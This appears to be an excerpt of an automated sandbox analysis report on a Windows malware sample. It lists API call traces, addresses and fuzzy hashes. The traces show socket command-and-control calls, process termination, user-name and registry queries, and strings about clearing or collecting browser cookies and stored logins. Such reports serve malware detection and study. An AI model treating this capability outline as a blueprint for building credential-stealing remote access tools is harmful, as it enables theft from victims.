                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                                • String ID:
                                                • API String ID: 3524115370-0
                                                • Opcode ID: 986ffed7f88aaac2b89297939494aa5c86be602e820aeb2fc323dd33349d82f8
                                                • Instruction ID: 6ec8d3a28f83b8578ae07b74a486faa57b0e20ac043ef5b33e925dc285618abe
                                                • Opcode Fuzzy Hash: 986ffed7f88aaac2b89297939494aa5c86be602e820aeb2fc323dd33349d82f8
                                                • Instruction Fuzzy Hash: C7112BF16002407FEB217734A999BAB7FD8AB82715F04843EE68262AD0C778AD44871D
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                                                • String ID:
                                                • API String ID: 1231779380-0
                                                • Opcode ID: 9532b84cd3d6fdac275936aa522e7c36b8ebc098c247d6622e756b8edd5b5c78
                                                • Instruction ID: 565288d66402da44d80f35b121c758f15f89b2f18a26fc00004be9e921349c24
                                                • Opcode Fuzzy Hash: 9532b84cd3d6fdac275936aa522e7c36b8ebc098c247d6622e756b8edd5b5c78
                                                • Instruction Fuzzy Hash: 4E01843620011CAB8B08EF68EC958EFB7EAFB88215744443DF917C7290DE309A45CB54
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00409E13,?,?), ref: 004119AE
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,00409E13,?,?), ref: 004119BB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,00409E13,?,?), ref: 004119CD
                                                • ReadFile.KERNEL32(00000000,00000000,?,00409E13,?,?), ref: 004119D5
                                                • CloseHandle.KERNEL32(00000000,00409E13,?,?), ref: 004119E3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 2061410294-0
                                                • Opcode ID: cfe8e39061eed12f12d7ea76829419e22fc1dcedfda31822001064d912202d0b
                                                • Instruction ID: c1641b8cee803a48650529896c1567fc698ce0bfe9ddfeea6561ea23c804a408
                                                • Opcode Fuzzy Hash: cfe8e39061eed12f12d7ea76829419e22fc1dcedfda31822001064d912202d0b
                                                • Instruction Fuzzy Hash: 1CF0A471201118BFEB115F60ECD9EFBBB2CEB467A6F108226FD15962A0C6355E41C668
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040E0D5
                                                • atoi.MSVCRT(00000000), ref: 0040E0DC
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001,-00010000), ref: 0040E104
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040E127
                                                • MessageBoxW.USER32(00000000,00000000), ref: 0040E12F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E13B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@??1?$basic_string@$??2@?length@?$basic_string@G@1@@MessageV01@@atoi
                                                • String ID:
                                                • API String ID: 1425508405-0
                                                • Opcode ID: 8e496c5c9f50ef922a7d9044c1d0f558d047650de926fc42336fbcde88a65c2d
                                                • Instruction ID: c0a38703f659e5a0c2706da8275acbd9ade6fdec43d2dd9129fd9c4cf88114e1
                                                • Opcode Fuzzy Hash: 8e496c5c9f50ef922a7d9044c1d0f558d047650de926fc42336fbcde88a65c2d
                                                • Instruction Fuzzy Hash: B101F4719051159FDF14ABA0DC59AFE776CEB04306F0044AAF502E20E0DE385A848E18
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00410E2C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414BD0,?,?), ref: 00410E45
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00410E54
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 00410E60
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410E6B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410E74
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                                • String ID:
                                                • API String ID: 3382107156-0
                                                • Opcode ID: 62dcdea65f463dbe7c30639eb1b0934039d72c6ac1d9fdd29727a672d8aa6cdd
                                                • Instruction ID: 5692310f77cd5f2a2bfc5674261ee475784c176fd1b0b7ffc65508031a147662
                                                • Opcode Fuzzy Hash: 62dcdea65f463dbe7c30639eb1b0934039d72c6ac1d9fdd29727a672d8aa6cdd
                                                • Instruction Fuzzy Hash: 0E018CB1C0010DAFDB01EF94EC49EDEBB7CEB18309F1081A6E515E2150EB74A7598BA4
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D265
                                                • StrToIntA.SHLWAPI(00000000), ref: 0040D26C
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D28F
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                  • Part of subcall function 00411F9F: SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@$D@1@@$??2@?length@?$basic_string@G@1@@InfoParametersSystemV01@@
                                                • String ID:
                                                • API String ID: 1485308852-0
                                                • Opcode ID: 13a76f7988c4364f187031a2d8dd5249b71c4b3df36451a571f2779d6b219720
                                                • Instruction ID: fe25fe19379bf1abe6192e87728e4350864f898ca73e16e85829aa7fae53df9a
                                                • Opcode Fuzzy Hash: 13a76f7988c4364f187031a2d8dd5249b71c4b3df36451a571f2779d6b219720
                                                • Instruction Fuzzy Hash: ADF0FB729041189BCB09BBB1EC5AAED7768AB54316F1044BEE502E20E0EF389A44CB59
                                                APIs
                                                • Sleep.KERNEL32 ref: 00406D12
                                                • Sleep.KERNEL32(00001388), ref: 00406D84
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00406DAE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00413E88,00000001), ref: 00406DD2
                                                  • Part of subcall function 00406B78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406B8A
                                                  • Part of subcall function 00406B78: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406BB5
                                                  • Part of subcall function 00406B78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406BBE
                                                  • Part of subcall function 00406B78: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00406BCD
                                                  • Part of subcall function 00406B78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies not found],?), ref: 00406BE8
                                                  • Part of subcall function 00406B78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406CEC
                                                Strings
                                                • [Cleared all cookies & stored logins!], xrefs: 00406DA9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040A99A
                                                • malloc.MSVCRT ref: 0040A9A8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040A9D7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00413670,?), ref: 0040A9E1
                                                APIs
                                                • RegisterClassExA.USER32(00000030), ref: 00412541
                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041255C
                                                • GetLastError.KERNEL32(?,00000000), ref: 00412566
                                                APIs
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040A1A3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040A1AD
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040A1C1
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00419D80,[INFO],00419288,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF), ref: 004020E2
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 004020EF
                                                  • Part of subcall function 004020D0: malloc.MSVCRT ref: 004020FC
                                                  • Part of subcall function 004020D0: recv.WS2_32(00419D80,00000000,00000000,00000000), ref: 0040210D
                                                  • Part of subcall function 004020D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402121
                                                  • Part of subcall function 004020D0: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040212B
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402134
                                                  • Part of subcall function 004020D0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402141
                                                  • Part of subcall function 004020D0: free.MSVCRT ref: 00402162
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402184
                                                  • Part of subcall function 004020D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040218D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040A1EC,00000000,?,?,?,?,?,?), ref: 0040A1D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040A1E1
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DD91
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 0040DDCB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 0040DDDF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004114FB
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0041150D
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00411519
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041153A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411543
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404477
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404484
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00404491
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040449E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004044AB
                                                APIs
                                                • socket.WS2_32(00000000,00000001,00000006), ref: 004024B0
                                                • connect.WS2_32(00000000,00419298,00000010), ref: 004024BF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00419288,?,00401671,00000061), ref: 004024D2
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • closesocket.WS2_32(00000000), ref: 004024EA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,00419298,00000010,00000000,00000001,00000006,00419288,?,00401671,00000061), ref: 004024F5
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D681
                                                • atoi.MSVCRT(00000000), ref: 0040D688
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0040D690
                                                  • Part of subcall function 00411221: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041122E
                                                  • Part of subcall function 00411221: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041123C
                                                  • Part of subcall function 00411221: CloseHandle.KERNEL32(00000000), ref: 00411248
                                                  • Part of subcall function 0040E7A5: EnumWindows.USER32(Function_0000E6BB,00000000), ref: 0040E7AC
                                                  • Part of subcall function 0040E7A5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419D70), ref: 0040E7BC
                                                  • Part of subcall function 0040E7A5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,00000063), ref: 0040E7D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
